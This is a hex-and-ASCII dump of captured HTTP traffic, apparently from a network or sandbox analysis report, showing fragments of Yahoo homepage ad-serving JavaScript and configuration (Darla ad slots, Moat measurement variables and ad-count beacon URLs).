                                                                                                                                                                        2023-06-02 11:13:21 UTC753INData Raw: 6e 74 3d 5c 5c 5c 22 5c 5c 5c 22 3b 5c 5c 6e 5c 22 29 3b 5c 72 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 2a 2d 2d 3e 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 3c 73 63 72 5c 22 2b 5c 22 69 70 74 20 73 72 63 3d 5c 5c 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 65 62 2d 6f 61 6f 2e 73 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 6d 61 78 5c 2f 61 64 53 65 72 76 65 2e 64 6f 3f 62 72 78 64 53 65 63 74 69 6f 6e 49 64 3d 31 34 36 37 35 30 30 35 31 26 62 72 78 64 50 75 62 6c 69 73 68 65 72 49 64 3d 32 30 34 35 39 39 33 33 32 32 33 26 79 70 75 62 62 6c 6f 62 3d 6c 75 3a 30 3b 70 74 3a 68 6f 6d 65 3b 73 69 74 65 3a 66 70 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 7c 37 4d 6a 47 42 7a 45 77 4c 6a 4c 6f 30 73 38 4d 54 58
                                                                                                                                                                        Data Ascii: nt=\\\"\\\";\\n\");\r\ndocument.write(\"*-->\\n\");\ndocument.write(\"<scr\"+\"ipt src=\\\"https:\/\/web-oao.ssp.yahoo.com\/admax\/adServe.do?brxdSectionId=146750051&brxdPublisherId=20459933223&ypubblob=lu:0;pt:home;site:fp;ver:megastrm|7MjGBzEwLjLo0s8MTX
                                                                                                                                                                        2023-06-02 11:13:21 UTC754INData Raw: 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 49 73 41 64 76 69 73 47 6f 61 6c 3d 30 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 45 76 65 6e 74 55 72 6c 3d 68 74 74 70 73 3a 5c 2f 5c 2f 35 2e 72 61 73 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 63 6f 75 6e 74 7c 32 2e 30 7c 35 31 31 33 2e 31 7c 34 38 33 30 33 39 39 7c 30 7c 31 37 30 7c 41 64 49 64 3d 31 31 31 30 31 39 33 38 3b 42 6e 49 64 3d 32 3b 63 74 3d 32 37 35 31 38 31 34 39 37 34 3b 73 74 3d 38 39 32 31 3b 61 64 63 69 64 3d 31 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 32 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 35 36 3b 69 6d 70 72 65 66 73 65 71 3d 31
                                                                                                                                                                        Data Ascii: ent.write(\"var zMoatIsAdvisGoal=0\\n\");\ndocument.write(\"var zMoatEventUrl=https:\/\/5.ras.yahoo.com\/adcount|2.0|5113.1|4830399|0|170|AdId=11101938;BnId=2;ct=2751814974;st=8921;adcid=1;itime=704401082;reqtype=5;;impref=16857044012738109156;imprefseq=1
                                                                                                                                                                        2023-06-02 11:13:21 UTC755INData Raw: 55 42 48 42 41 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 49 6d 70 52 65 66 54 73 3d 31 36 38 35 37 30 34 34 30 31 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 41 6c 69 61 73 3d 79 34 30 36 31 39 32 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 57 65 62 73 69 74 65 49 44 3d 33 37 34 30 35 38 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 56 65 72 74 3d 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 42 61 6e 6e 65 72 49 6e 66 6f 3d 34 39 38 30 34 31 36 34 34 5c 5c
                                                                                                                                                                        Data Ascii: UBHBA\\n\");\ndocument.write(\"var zMoatImpRefTs=1685704401\\n\");\ndocument.write(\"var zMoatAlias=y406192\\n\");\ndocument.write(\"var zMoatWebsiteID=374058\\n\");\ndocument.write(\"var zMoatVert=\\n\");\ndocument.write(\"var zMoatBannerInfo=498041644\\
                                                                                                                                                                        2023-06-02 11:13:21 UTC757INData Raw: 37 35 31 38 31 34 39 37 34 3b 73 74 3d 39 30 32 39 3b 61 64 63 69 64 3d 31 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 32 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 35 36 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 33 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4c 52 45 43 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70 74 25 32 35 33 41 68 6f 6d 65 25 32 35 33 42 73 69 74 65 25 32 35 33 41 66 70 25 32 35 33 42 76 65 72 25 32 35 33 41 6d 65 67 61 73 74 72 6d
                                                                                                                                                                        Data Ascii: 751814974;st=9029;adcid=1;itime=704401082;reqtype=5;;impref=16857044012738109156;imprefseq=19990521736859363;imprefts=1685704401;adclntid=1004;spaceid=2023538075;adposition=LREC;lmsid=;revshare=lu%253A0%253Bpt%253Ahome%253Bsite%253Afp%253Bver%253Amegastrm
                                                                                                                                                                        2023-06-02 11:13:21 UTC758INData Raw: 31 32 37 33 38 31 30 39 31 35 36 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 33 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4c 52 45 43 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70 74 25 32 35 33 41 68 6f 6d 65 25 32 35 33 42 73 69 74 65 25 32 35 33 41 66 70 25 32 35 33 42 76 65 72 25 32 35 33 41 6d 65 67 61 73 74 72 6d 3b 70 76 69 64 3d 37 4d 6a 47 42 7a 45 77 4c 6a 4c 6f 30 73 38 4d 54 58 77 6a 4c 79 6d 37 4d 54 41 79 4c 67 41 41 41 41 43 6b 42 4e 55 75 3b 73 65 63 74 69 6f 6e 69 64 3d 31 34 36 37 35 30 30 35 31 3b 6b 76
                                                                                                                                                                        Data Ascii: 12738109156;imprefseq=19990521736859363;imprefts=1685704401;adclntid=1004;spaceid=2023538075;adposition=LREC;lmsid=;revshare=lu%253A0%253Bpt%253Ahome%253Bsite%253Afp%253Bver%253Amegastrm;pvid=7MjGBzEwLjLo0s8MTXwjLym7MTAyLgAAAACkBNUu;sectionid=146750051;kv
                                                                                                                                                                        2023-06-02 11:13:21 UTC759INData Raw: 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72 6e 65 74 25 35 46 65 78 70 6c 6f 72 65 72 25 35 46 25 32 44 25 35 46 77 69 6e 64 6f 77 73 3b 6b 76 72 65 70 6f 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 76 65 72 73 69 6f 6e 3d 4e 54 25 32 30 31 30 25 32 45 30 3b 6b 76 61 64 74 63 25 35 46 63 72 6d 63 63 3d 55 4e 4b 4e 4f 57 4e 3b 6b 76 61 64 74 63 25 35 46 63 72 6d 6e 63 3d 55 4e 4b 4e 4f 57 4e 3b 67 64 70 72 3d 30 3b 22 2c 22 62 65 68 61 76 69 6f 72 22 3a 22 6e 6f 6e 5f 65 78 70 22 2c 22 61 64 49 44 22 3a 22 31 31 31 30 31 39 33
                                                                                                                                                                        Data Ascii: dtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=internet%5Fexplorer%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;","behavior":"non_exp","adID":"1110193
                                                                                                                                                                        2023-06-02 11:13:21 UTC760INData Raw: 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 2c 22 4d 41 53 54 22 3a 7b 22 65 78 63 6c 75 73 69 76 65 22 3a 66 61 6c 73 65 2c 22 66 61 6c 6c 42 61 63 6b 22 3a 66 61 6c 73 65 2c 22 6e 6f 41 64 22 3a 74 72 75 65 2c 22 70 61 73 73 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 2c 22 4d 4f 4e 22 3a 7b 22 65 78 63 6c 75 73 69 76 65 22 3a 66 61 6c 73 65 2c 22 66 61 6c 6c 42 61 63 6b 22 3a 66 61 6c 73 65 2c 22 6e 6f 41 64 22 3a 74 72 75 65 2c 22 70 61 73 73 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 7d 2c 22 72 65 70 6c 61 63 65 64 22 3a 22 4d 41 53 54 2c 4d 4f 4e 22 2c 22 77 69 6e 6e 65 72 73 22 3a 5b 7b 22 67 72 6f 75 70 22 3a 31 2c 22 6e 6f 74 65 73 22 3a 22 57 69 6e 6e 69
                                                                                                                                                                        Data Ascii: priority":false},"MAST":{"exclusive":false,"fallBack":false,"noAd":true,"passback":false,"priority":false},"MON":{"exclusive":false,"fallBack":false,"noAd":true,"passback":false,"priority":false}},"replaced":"MAST,MON","winners":[{"group":1,"notes":"Winni
                                                                                                                                                                        2023-06-02 11:13:21 UTC762INData Raw: 44 31 31 25 32 44 31 25 37 43 79 73 64 25 37 43 31 3b 6b 76 73 65 63 75 72 65 3d 74 72 75 65 3b 6b 76 6d 6e 3d 79 34 30 36 31 39 36 3b 6b 76 79 25 32 44 62 75 63 6b 65 74 3d 39 30 30 3b 6b 76 70 67 63 6f 6c 6f 3d 62 66 31 3b 6b 76 72 73 3d 6c 75 3a 73 69 74 65 3a 30 3a 70 74 3a 6d 65 67 61 73 74 72 6d 3a 66 70 3a 76 65 72 3a 68 6f 6d 65 3b 6b 76 73 73 70 3d 73 73 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6b 74 6e 61 6d 65 3d 75 6e 6b 6e 6f 77 6e 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72 6e
                                                                                                                                                                        Data Ascii: D11%2D1%7Cysd%7C1;kvsecure=true;kvmn=y406196;kvy%2Dbucket=900;kvpgcolo=bf1;kvrs=lu:site:0:pt:megastrm:fp:ver:home;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=intern
                                                                                                                                                                        2023-06-02 11:13:21 UTC763INData Raw: 55 4e 4b 4e 4f 57 4e 3b 67 64 70 72 3d 30 3b 5c 22 3e 22 2c 22 63 73 63 55 52 49 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 35 2e 72 61 73 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 63 6f 75 6e 74 7c 32 2e 30 7c 35 31 31 33 2e 31 7c 34 38 33 30 34 32 34 7c 30 7c 30 7c 41 64 49 64 3d 2d 34 31 3b 42 6e 49 64 3d 30 3b 63 74 3d 32 37 35 31 38 31 34 39 37 34 3b 73 74 3d 31 32 30 37 33 3b 61 64 63 69 64 3d 30 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 35 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 36 39 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 36 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61
                                                                                                                                                                        Data Ascii: UNKNOWN;gdpr=0;\">","cscURI":"https:\/\/5.ras.yahoo.com\/adcount|2.0|5113.1|4830424|0|0|AdId=-41;BnId=0;ct=2751814974;st=12073;adcid=0;itime=704401085;reqtype=5;;impref=16857044012738109169;imprefseq=19990521736859366;imprefts=1685704401;adclntid=1004;spa
                                                                                                                                                                        2023-06-02 11:13:21 UTC764INData Raw: 6f 6c 6c 61 70 73 65 5c 22 3a 5c 22 43 6f 6c 6c 61 70 73 65 5c 22 2c 5c 22 66 64 62 5c 22 3a 5c 22 49 20 64 6f 6e 27 74 20 6c 69 6b 65 20 74 68 69 73 20 61 64 5c 22 2c 5c 22 63 6f 64 65 5c 22 3a 5c 22 65 6e 2d 75 73 5c 22 7d 22 2c 22 69 73 33 72 64 22 3a 31 2c 22 66 61 63 53 74 61 74 75 73 22 3a 7b 7d 2c 22 75 73 65 72 50 72 6f 76 69 64 65 64 44 61 74 61 22 3a 7b 7d 2c 22 66 61 63 52 6f 74 61 74 69 6f 6e 22 3a 7b 7d 2c 22 73 6c 6f 74 44 61 74 61 22 3a 7b 7d 2c 22 73 69 7a 65 22 3a 22 31 78 31 22 7d 7d 2c 22 63 6f 6e 66 22 3a 7b 22 77 22 3a 31 2c 22 68 22 3a 31 7d 7d 2c 7b 22 69 64 22 3a 22 4d 4f 4e 22 2c 22 68 74 6d 6c 22 3a 22 3c 21 2d 2d 20 53 70 61 63 65 49 44 3d 32 30 32 33 35 33 38 30 37 35 20 6c 6f 63 3d 4d 4f 4e 20 6e 6f 61 64 20 2d 2d 3e 3c 21 2d
                                                                                                                                                                        Data Ascii: ollapse\":\"Collapse\",\"fdb\":\"I don't like this ad\",\"code\":\"en-us\"}","is3rd":1,"facStatus":{},"userProvidedData":{},"facRotation":{},"slotData":{},"size":"1x1"}},"conf":{"w":1,"h":1}},{"id":"MON","html":"... SpaceID=2023538075 loc=MON noad --><!-
                                                                                                                                                                        2023-06-02 11:13:21 UTC766INData Raw: 3d 2d 34 31 3b 42 6e 49 64 3d 30 3b 63 74 3d 32 37 35 31 38 31 34 39 37 34 3b 73 74 3d 31 33 38 37 35 3b 61 64 63 69 64 3d 30 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 38 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 38 30 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 39 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4d 4f 4e 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70 74 25 32 35 33 41 68 6f 6d 65 25 32 35 33 42 73 69 74 65 25 32 35 33 41 66 70 25 32 35 33 42
                                                                                                                                                                        Data Ascii: =-41;BnId=0;ct=2751814974;st=13875;adcid=0;itime=704401088;reqtype=5;;impref=16857044012738109180;imprefseq=19990521736859369;imprefts=1685704401;adclntid=1004;spaceid=2023538075;adposition=MON;lmsid=;revshare=lu%253A0%253Bpt%253Ahome%253Bsite%253Afp%253B
                                                                                                                                                                        2023-06-02 11:13:21 UTC767INData Raw: 65 72 3a 68 6f 6d 65 3b 6b 76 73 73 70 3d 73 73 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6b 74 6e 61 6d 65 3d 75 6e 6b 6e 6f 77 6e 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72 6e 65 74 25 35 46 65 78 70 6c 6f 72 65 72 25 35 46 25 32 44 25 35 46 77 69 6e 64 6f 77 73 3b 6b 76 72 65 70 6f 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 76 65 72 73 69 6f 6e 3d 4e 54 25 32 30 31 30 25 32 45 30 3b 6b 76 61 64 74 63 25 35 46 63 72 6d 63
                                                                                                                                                                        Data Ascii: er:home;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=internet%5Fexplorer%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmc
                                                                                                                                                                        2023-06-02 11:13:21 UTC768INData Raw: 38 30 20 72 73 3d 5c 22 6c 75 3a 30 3b 70 74 3a 68 6f 6d 65 3b 73 69 74 65 3a 66 70 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 5c 22 22 2c 22 73 65 63 75 72 65 22 3a 74 72 75 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 66 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 22 2c 22 66 69 6c 74 65 72 22 3a 22 6e 6f 5f 65 78 70 61 6e 64 61 62 6c 65 3b 22 2c 22 64 61 72 6c 61 49 44 22 3a 22 64 61 72 6c 61 5f 69 6e 73 74 61 6e 63 65 5f 31 36 38 35 37 30 34 34 30 31 30 33 37 5f 31 34 31 36 39 31 31 31 34 33 5f 30 22 7d 2c 22 70 79 6d 22 3a 6e 75 6c 6c 2c 22 68 6f 73 74 22 3a 22 22 2c 22 66 69 6c 74 65 72 65 64 22 3a 5b 5d 2c 22 70 65 22 3a 22 22 7d 7d 7d 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: 80 rs=\"lu:0;pt:home;site:fp;ver:megastrm\"","secure":true,"lang":"en-US","ref":"https:\/\/www.yahoo.com\/","filter":"no_expandable;","darlaID":"darla_instance_1685704401037_1416911143_0"},"pym":null,"host":"","filtered":[],"pe":""}}}</script>
                                                                                                                                                                        2023-06-02 11:13:21 UTC769INData Raw: 20 28 20 65 76 65 6e 74 2c 20 70 61 72 61 6d 73 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 72 61 6d 73 20 3d 20 70 61 72 61 6d 73 20 7c 7c 20 7b 20 62 75 62 62 6c 65 73 3a 20 74 72 75 65 2c 20 63 61 6e 63 65 6c 61 62 6c 65 3a 20 74 72 75 65 2c 20 64 65 74 61 69 6c 3a 20 6e 75 6c 6c 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 65 76 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 20 27 43 75 73 74 6f 6d 45 76 65 6e 74 27 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 74 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 20 65 76 65 6e 74 2c 20 70 61 72 61 6d 73 2e 62 75 62 62 6c 65 73 2c 20 70 61 72 61 6d 73 2e 63 61 6e 63
                                                                                                                                                                        Data Ascii: ( event, params ) { params = params || { bubbles: true, cancelable: true, detail: null }; var evt = document.createEvent( 'CustomEvent' ); evt.initCustomEvent( event, params.bubbles, params.canc
                                                                                                                                                                        2023-06-02 11:13:21 UTC771INData Raw: 74 74 70 73 3a 5c 2f 5c 2f 73 2e 79 69 6d 67 2e 63 6f 6d 5c 2f 72 71 5c 2f 64 61 72 6c 61 5c 2f 34 2d 31 31 2d 31 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 34 2d 31 31 2d 31 22 2c 22 74 70 62 55 52 49 22 3a 22 22 2c 22 68 6f 73 74 46 69 6c 65 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 79 69 6d 67 2e 63 6f 6d 5c 2f 72 71 5c 2f 64 61 72 6c 61 5c 2f 34 2d 31 31 2d 31 5c 2f 6a 73 5c 2f 67 2d 72 2d 6d 69 6e 2e 6a 73 22 2c 22 62 65 61 63 6f 6e 73 44 69 73 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 72 6f 74 61 74 69 6f 6e 54 69 6d 69 6e 67 44 69 73 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 66 64 62 5f 6c 6f 63 61 6c 65 22 3a 22 57 68 61 74 20 64 6f 6e 27 74 20 79 6f 75 20 6c 69 6b 65 20 61 62 6f 75 74 20 74 68 69 73 20 61 64 3f 7c 49 74 27 73 20 6f 66 66 65 6e 73 69 76
                                                                                                                                                                        Data Ascii: ttps:\/\/s.yimg.com\/rq\/darla\/4-11-1","version":"4-11-1","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/js\/g-r-min.js","beaconsDisabled":true,"rotationTimingDisabled":true,"fdb_locale":"What don't you like about this ad?|It's offensiv
                                                                                                                                                                        2023-06-02 11:13:21 UTC772INData Raw: 64 62 22 3a 31 2c 22 68 22 3a 32 35 30 2c 22 69 64 22 3a 22 4c 52 45 43 22 2c 22 6d 65 74 61 53 69 7a 65 22 3a 74 72 75 65 2c 22 70 6f 73 22 3a 22 4c 52 45 43 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78 70 2d 6f 76 72 22 3a 30 2c 22 65 78 70 2d 70 75 73 68 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 2c 22 6d 65 74 61 22 3a 7b 22 68 6f 73 74 55 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 22 7d 2c 22 64 6f 75 62 6c 65 42 75 66 66 65 72 69 6e 67 22 3a 66 61 6c 73 65 7d 2c 22 4d 41 53 54 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 4d 41 53 54 22 2c 22 63 6c 6f 73 65 42 74 6e 22 3a 7b 22 61 64 63 22 3a 30 2c 22 6d 6f 64 65 22 3a 32 2c 22 75 73 65 53 68 6f 77 22 3a 31 7d 2c 22 64 65 73 74
                                                                                                                                                                        Data Ascii: db":1,"h":250,"id":"LREC","metaSize":true,"pos":"LREC","supports":{"exp-ovr":0,"exp-push":0,"lyr":0},"w":300,"meta":{"hostURL":"https:\/\/www.yahoo.com\/"},"doubleBuffering":false},"MAST":{"clean":"sda-MAST","closeBtn":{"adc":0,"mode":2,"useShow":1},"dest
                                                                                                                                                                        2023-06-02 11:13:21 UTC773INData Raw: 7d 2c 22 4d 4f 4e 32 22 3a 7b 22 61 75 74 6f 49 56 22 3a 31 2c 22 61 75 74 6f 4d 61 78 22 3a 32 35 2c 22 61 75 74 6f 52 54 22 3a 22 31 30 30 30 30 22 7d 7d 2c 22 67 72 6f 75 70 73 22 3a 7b 22 4c 52 45 43 33 22 3a 22 4d 4f 4e 32 22 2c 22 4c 52 45 43 34 22 3a 22 4d 4f 4e 32 22 2c 22 4d 4f 4e 32 22 3a 22 4c 52 45 43 33 2c 4c 52 45 43 34 22 7d 2c 22 73 70 22 3a 32 30 32 33 35 33 38 30 37 35 2c 22 73 61 22 3a 22 59 2d 42 55 43 4b 45 54 3d 5c 22 39 30 30 5c 22 20 63 74 6f 75 74 3d 33 38 30 20 72 73 3d 5c 22 6c 75 3a 30 3b 70 74 3a 68 6f 6d 65 3b 73 69 74 65 3a 66 70 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 5c 22 20 72 65 66 72 65 73 68 3d 74 72 75 65 22 2c 22 72 65 66 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 22 2c 22 75
                                                                                                                                                                        Data Ascii: },"MON2":{"autoIV":1,"autoMax":25,"autoRT":"10000"}},"groups":{"LREC3":"MON2","LREC4":"MON2","MON2":"LREC3,LREC4"},"sp":2023538075,"sa":"Y-BUCKET=\"900\" ctout=380 rs=\"lu:0;pt:home;site:fp;ver:megastrm\" refresh=true","ref":"https:\/\/www.yahoo.com\/","u
                                                                                                                                                                        2023-06-02 11:13:21 UTC773INData Raw: 72 6f 70 65 72 74 79 22 3a 22 66 70 5f 65 6e 2d 55 53 22 2c 22 72 69 64 22 3a 22 33 63 72 73 70 69 35 69 37 6a 6a 6d 67 22 2c 22 74 65 73 74 22 3a 22 39 30 30 22 7d 7d 7d 2c 22 61 64 46 65 74 63 68 22 3a 7b 22 70 73 22 3a 22 4c 44 52 42 2c 4c 52 45 43 2c 4d 41 53 54 2c 4d 4f 4e 22 2c 22 73 70 22 3a 32 30 32 33 35 33 38 30 37 35 2c 22 73 61 22 3a 22 59 2d 42 55 43 4b 45 54 3d 5c 22 39 30 30 5c 22 20 63 74 6f 75 74 3d 33 38 30 20 72 73 3d 5c 22 6c 75 3a 30 3b 70 74 3a 68 6f 6d 65 3b 73 69 74 65 3a 66 70 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 5c 22 22 2c 22 72 65 66 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 22 2c 22 75 6c 74 22 3a 7b 22 70 67 22 3a 7b 22 70 72 6f 70 65 72 74 79 22 3a 22 66 70 5f 65 6e 2d 55 53 22 2c
                                                                                                                                                                        Data Ascii: roperty":"fp_en-US","rid":"3crspi5i7jjmg","test":"900"}}},"adFetch":{"ps":"LDRB,LREC,MAST,MON","sp":2023538075,"sa":"Y-BUCKET=\"900\" ctout=380 rs=\"lu:0;pt:home;site:fp;ver:megastrm\"","ref":"https:\/\/www.yahoo.com\/","ult":{"pg":{"property":"fp_en-US",
                                                                                                                                                                        2023-06-02 11:13:21 UTC775INData Raw: 3d 20 5b 22 41 55 54 4f 22 2c 22 74 61 62 73 77 69 74 63 68 22 5d 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 73 41 64 52 65 66 72 65 73 68 45 76 65 6e 74 20 3d 20 61 64 52 65 66 72 65 73 68 45 76 65 6e 74 2e 69 6e 64 65 78 4f 66 28 65 76 65 6e 74 4e 61 6d 65 29 20 21 3d 3d 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 69 20 3d 20 30 2c 20 6c 20 3d 20 70 73 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 20 3d 20 70 73 5b 69 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 49 74 65 6d 20 3d 20 72 65 73 75 6c 74 2e 69 74 65 6d 28 70 6f 73 69 74 69 6f 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 77 68 69 74 65 6c 69 73 74 65 64 53 6c 75 67 50 6f 73
                                                                                                                                                                        Data Ascii: = ["AUTO","tabswitch"]; var isAdRefreshEvent = adRefreshEvent.indexOf(eventName) !== -1; for (i = 0, l = ps.length; i < l; i++) { position = ps[i]; posItem = result.item(position); var whitelistedSlugPos
